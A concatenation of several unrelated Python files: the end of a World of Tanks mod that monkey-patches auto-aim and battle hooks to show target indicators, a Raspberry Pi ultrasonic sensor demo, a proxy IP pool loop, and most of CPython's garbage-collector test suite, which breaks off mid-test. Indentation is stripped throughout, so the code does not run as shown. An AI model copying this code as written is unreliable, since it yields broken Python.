return self.get_battle_on() and player.arena.vehicles[player.playerVehicleID]['team'] == player.arena.vehicles[vehicle_id]['team']
def create_indicators(self):
if self.indicatorBox:
self.create_box()
if self.indicatorDirection:
self.create_direction()
if self.indicatorModel:
self.create_model()
def install_indicators(self):
self.autoaim_vehicle = None
self.create_indicators()
def uninstall_indicators(self):
self.delete_indicators()
self.autoaim_vehicle = None
self.view_edge_callback = None
self.view_direction_callback = None
def view_indicators(self):
if isinstance(self.autoaim_vehicle, Vehicle.Vehicle) and self.autoaim_vehicle.isStarted and self.get_is_live(self.autoaim_vehicle.id) and not self.get_is_friendly(self.autoaim_vehicle.id):
if self.indicatorBox:
self.view_box()
if self.indicatorEdge:
self.view_edge_callback = BigWorld.callback(0.5, self.view_edge)
if self.indicatorModel:
self.view_model()
if self.indicatorDirection:
self.view_direction_callback = BigWorld.callback(0.5, self.view_direction)
else:
self.autoaim_vehicle = None
def hide_indicators(self):
if self.indicatorBox:
self.hide_box()
if self.indicatorEdge:
if self.view_edge_callback:
self.view_edge_callback = None
if self.indicatorModel:
self.hide_model()
if self.indicatorDirection:
if self.view_direction_callback:
self.view_direction_callback = None
self.hide_direction()
self.autoaim_vehicle = None
def create_box(self):
self._box = GUI.BoundingBox(self._box_tex)
self._box.size = (0.01, 0.01)
self._box.visible = False
GUI.addRoot(self._box)
def create_model(self):
if self._model:
self.delete_model()
if self._model_blank:
self.delete_blank_model()
if self.indicatorModel:
self._model = BigWorld.Model(self._model_tex)
self._model.visible = False
elif self.indicatorEdge and not self.indicatorModel:
self._model_blank = BigWorld.Model(self._model_blank_text)
self._model_blank.visible = False
def create_direction(self):
if self.indicatorDirection:
# noinspection PyProtectedMember
self._direction = layout._DirectionIndicator()
self._direction.component.visible = False
self._direction.active(False)
if self._color in ['cream', 'emerald', 'gold', 'green', 'green_yellow', 'lime', 'wg_friend', 'wg_squad', 'yellow']:
self._direction.setShape('green')
elif self._color in ['brown', 'chocolate', 'orange', 'pink', 'red', 'wg_enemy']:
self._direction.setShape('red')
elif self._color in ['blue', 'cornflower_blue', 'cyan', 'hot_pink', 'purple', 'wg_blur']:
self._direction.setShape('purple')
else:
self._direction.setShape('red')
def view_box(self):
if hasattr(self.autoaim_vehicle, 'model') and self._box:
self._box.source = self.autoaim_vehicle.model.bounds
self._box.visible = True
def view_model(self):
if self._model:
if hasattr(self.autoaim_vehicle, 'appearance'):
self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint').attach(self._model)
self._model.visible = True
if self._model_blank:
if hasattr(self.autoaim_vehicle, 'appearance'):
self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint').attach(self._model_blank)
self._model_blank.visible = True
def view_edge(self):
if hasattr(self.autoaim_vehicle, 'appearance') and hasattr(self.autoaim_vehicle, 'model') and self.autoaim_vehicle.isAlive():
BigWorld.wgDelEdgeDetectEntity(self.autoaim_vehicle)
if BigWorld.wg_collideSegment(BigWorld.player().spaceID, self.autoaim_vehicle.appearance.modelsDesc['gun']['model'].position, BigWorld.entity(BigWorld.player(
).playerVehicleID).appearance.modelsDesc['gun']['model'].position, False) is None:
BigWorld.wgSetEdgeDetectColors((Math.Vector4(self._autoaim_def), Math.Vector4(self._enemy), Math.Vector4(self._friend), Math.Vector4(self._autoaim)))
BigWorld.wgAddEdgeDetectEntity(self.autoaim_vehicle, 3, 0)
self.view_edge_callback = BigWorld.callback(0.5, self.view_edge)
def view_direction(self):
try:
if self.autoaim_vehicle is not None and self.get_is_live(self.autoaim_vehicle.id):
self._direction.component.visible = True
self._direction.active(True)
matrix = self.autoaim_vehicle.matrix
if matrix:
m = Math.Matrix(matrix)
pos = m.translation
length = (BigWorld.player().position - pos).length
self._direction.setPosition(pos)
self._direction.setDistance(length)
self.view_direction_callback = BigWorld.callback(0.5, self.view_direction)
except StandardError:
self.view_direction_callback = None
def hide_box(self):
if self._box:
self._box.source = None
self._box.visible = False
def hide_model(self):
if self._model and self._model.visible:
self._model.visible = False
if hasattr(self.autoaim_vehicle, 'appearance'):
turret_position = self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint')
if turret_position.attachments.length != 0:
turret_position.detach(self._model)
if self._model_blank and self._model_blank.visible:
self._model_blank.visible = False
if hasattr(self.autoaim_vehicle, 'appearance'):
turret_position = self.autoaim_vehicle.appearance.modelsDesc['hull']['model'].node('HP_turretJoint')
if turret_position.attachments.length != 0:
turret_position.detach(self._model_blank)
self.create_model()
def hide_edge(self):
if hasattr(self.autoaim_vehicle, 'appearance'):
BigWorld.wgDelEdgeDetectEntity(self.autoaim_vehicle)
BigWorld.wgSetEdgeDetectColors((Math.Vector4(self._autoaim_def), Math.Vector4(self._enemy_def), Math.Vector4(self._friend_def), Math.Vector4(self._flag_def)))
def hide_direction(self):
if self._direction:
self._direction.component.visible = False
self._direction.active(False)
def delete_indicators(self):
self.delete_direction()
self.delete_box()
self.delete_model()
def delete_direction(self):
if self._direction:
self._direction = None
def delete_box(self):
if self._box:
GUI.delRoot(self._box)
self._box = None
def delete_model(self):
self._model = None
def delete_blank_model(self):
self._model_blank = None
def start_battle(self):
BigWorld.player().arena.onVehicleKilled += self.injected_on_vehicle_killed
self.install_indicators()
def stop_battle(self):
BigWorld.player().arena.onVehicleKilled -= self.injected_on_vehicle_killed
self.hide_indicators()
self.uninstall_indicators()
def injected_on_vehicle_killed(self, target_id, attacker_id, equipment_id, reason):
_, _, _ = attacker_id, reason, equipment_id
if self.autoaim_vehicle and target_id == self.autoaim_vehicle.id:
self.hide_indicators()
if target_id == BigWorld.player().playerVehicleID:
self.hide_indicators()
# deformed functions:
def hook_update_all(self):
hooked_UpdateAll(self)
config.analytics()
def hook_auto_aim(self, target):
if config.enable and not self.autoaim_extended.use:
old_vehicle = autoaim_extended.autoaim_vehicle
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
if old_vehicle != target:
autoaim_extended.autoaim_vehicle = target
autoaim_extended.view_indicators()
return hooked_autoAim(self, target)
def hook_on_auto_aim_vehicle_lost(self):
if config.enable:
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
return hooked_onAutoAimVehicleLost(self)
def hook_on_lock_target(self, lock):
if config.enable:
player = BigWorld.player()
if not isPlayerAvatar():
return
if self.isPlaying:
if lock == 1:
player.autoAim(autoaim_extended.find_autoaim_target())
elif lock == 0:
player.autoAim(None)
else:
player.autoAim(None)
elif self.isRecording:
self._BattleReplay__replayCtrl.onLockTarget(lock)
else:
hooked_onLockTarget(self, lock)
def hook_start_battle(self):
hooked_start_battle(self)
if config.enable:
autoaim_extended.start_battle()
def hook_stop_battle(self):
hooked_stop_battle(self)
if config.enable:
autoaim_extended.stop_battle()
class Autoaim_extended():
def __init__(self):
self.use = False
self.target = autoaim_extended.autoaim_vehicle
def start(self, target):
if not self.use:
self.use = True
if config.enable:
old_vehicle = autoaim_extended.autoaim_vehicle
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
if old_vehicle != target:
autoaim_extended.autoaim_vehicle = target
autoaim_extended.view_indicators()
return True
return
def stop(self):
if not self.use:
self.use = True
if config.enable:
if autoaim_extended.autoaim_vehicle:
autoaim_extended.hide_indicators()
return True
return
#hooked
# noinspection PyProtectedMember
hooked_UpdateAll = Hangar._Hangar__updateAll
hooked_autoAim = PlayerAvatar.autoAim
hooked_onAutoAimVehicleLost = PlayerAvatar.onAutoAimVehicleLost
hooked_onLockTarget = BattleReplay.onLockTarget
hooked_start_battle = Battle.afterCreate
hooked_stop_battle = Battle.beforeDelete
#hook
Hangar._Hangar__updateAll = hook_update_all
PlayerAvatar.autoAim = hook_auto_aim
PlayerAvatar.onAutoAimVehicleLost = hook_on_auto_aim_vehicle_lost
BattleReplay.onLockTarget = hook_on_lock_target
Battle.afterCreate = hook_start_battle
Battle.beforeDelete = hook_stop_battle
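# The block above is plain monkey-patching: the original bound methods are kept
# in module-level hooked_* names, and the class attributes are re-pointed at
# wrappers that run the mod's logic and then delegate to the originals.
# A minimal, game-independent sketch of the same idea (illustrative only, not
# part of the mod):
#
#   class Client(object):
#       def fire(self):
#           print 'fire'
#
#   hooked_fire = Client.fire        # keep a reference to the original
#   def hook_fire(self):
#       print 'before fire'          # injected behaviour
#       return hooked_fire(self)     # delegate to the original method
#   Client.fire = hook_fire          # install the wrapper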
#start mod
config = Config()
config.load_mod()
autoaim_extended = AutoAim()
PlayerAvatar.autoaim_extended = Autoaim_extended()
|
sensor-threaded.py
|
#!/usr/bin/python3
"""
Program: HC-SR04 Sensor Demo (sensor-threaded.py)
Author: M. Heidenreich, (c) 2020
Description:
This code is provided in support of the following YouTube tutorial:
https://youtu.be/JvQKZXCYMUM
This example shows how to use the HC-SR04 sensor to provide a continuous
distance readout with Raspberry Pi using a multi-threaded approach:
a background thread polls the sensor while the main thread waits for signals.
THIS SOFTWARE AND LINKED VIDEO TUTORIAL ARE PROVIDED "AS IS" AND THE
AUTHOR DISCLAIMS ALL WARRANTIES INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
from signal import signal, SIGTERM, SIGHUP, pause
from time import sleep
from threading import Thread
from gpiozero import DistanceSensor
reading = True
sensor = DistanceSensor(echo=20, trigger=21)
def safe_exit(signum, frame):
exit(1)
def read_distance():
global message
while reading:
message = f"Distance: {sensor.value:1.2f} m"
print(message)
sleep(0.1)
try:
signal(SIGTERM, safe_exit)
signal(SIGHUP, safe_exit)
reader = Thread(target=read_distance, daemon=True)
reader.start()
pause()
except KeyboardInterrupt:
pass
finally:
reading = False
reader.join()
sensor.close()
|
IpAddressPoolMain1.py
|
import time
import threading
from service.IpService import testIp
from service.IpService import acquire
from service.IpService import deleteIp
import traceback
from Log import log
def main():
    log.info('Program started')
try:
threading.Thread(target=checkIpMain).start()
threading.Thread(target=updata).start()
except:
main()
def updata():
    log.info('Update thread started!!!')
    while True:
try:
acquire(1)
time.sleep(6)
except:
traceback.print_exc()
log.error("更新时有异常。。。。")
time.sleep(2)
def checkIpMain():
while True:
try:
            log.info('Check thread running!!!')
testIp()
deleteIp()
time.sleep(6)
except:
traceback.print_exc()
log.error("测试时有异常。。。。")
time.sleep(2)
if __name__ == '__main__':
main()
|
test_gc.py
|
import unittest
import unittest.mock
from test.support import (verbose, refcount_test,
cpython_only, start_threads,
temp_dir, TESTFN, unlink,
import_module)
from test.support.script_helper import assert_python_ok, make_script
import gc
import sys
import sysconfig
import textwrap
import threading
import time
import weakref
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
try:
from _testcapi import ContainerNoGC
except ImportError:
ContainerNoGC = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
if sysconfig.get_config_vars().get('PY_CFLAGS', ''):
BUILD_WITH_NDEBUG = ('-DNDEBUG' in sysconfig.get_config_vars()['PY_CFLAGS'])
else:
# Usually, sys.gettotalrefcount() is only present if Python has been
# compiled in debug mode. If it's missing, expect that Python has
# been released in release mode: with NDEBUG defined.
BUILD_WITH_NDEBUG = (not hasattr(sys, 'gettotalrefcount'))
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
        # __del__ methods can trigger collection; make this happen.
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
        # __del__ methods can trigger collection; make this happen.
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertTrue(gc.is_tracked(UserClassSlots()))
self.assertTrue(gc.is_tracked(UserFloatSlots()))
self.assertTrue(gc.is_tracked(UserIntSlots()))
def test_is_finalized(self):
        # Objects that are not tracked by the GC always return False
self.assertFalse(gc.is_finalized(3))
storage = []
class Lazarus:
def __del__(self):
storage.append(self)
lazarus = Lazarus()
self.assertFalse(gc.is_finalized(lazarus))
del lazarus
gc.collect()
lazarus = storage.pop()
self.assertTrue(gc.is_finalized(lazarus))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout, b"")
return stderr
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
def test_freeze(self):
gc.freeze()
self.assertGreater(gc.get_freeze_count(), 0)
gc.unfreeze()
self.assertEqual(gc.get_freeze_count(), 0)
def test_get_objects(self):
gc.collect()
l = []
l.append(l)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=0)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=1)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=2)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
del l
gc.collect()
def test_get_objects_arguments(self):
gc.collect()
self.assertEqual(len(gc.get_objects()),
len(gc.get_objects(generation=None)))
self.assertRaises(ValueError, gc.get_objects, 1000)
self.assertRaises(ValueError, gc.get_objects, -1000)
self.assertRaises(TypeError, gc.get_objects, "1")
self.assertRaises(TypeError, gc.get_objects, 1.234)
def test_resurrection_only_happens_once_per_object(self):
class A: # simple self-loop
def __init__(self):
self.me = self
class Lazarus(A):
resurrected = 0
resurrected_instances = []
def __del__(self):
Lazarus.resurrected += 1
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
# We start with 0 resurrections
laz = Lazarus()
self.assertEqual(Lazarus.resurrected, 0)
# Deleting the instance and triggering a collection
# resurrects the object
del laz
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
self.assertEqual(len(Lazarus.resurrected_instances), 1)
# Clearing the references and forcing a collection
# should not resurrect the object again.
Lazarus.resurrected_instances.clear()
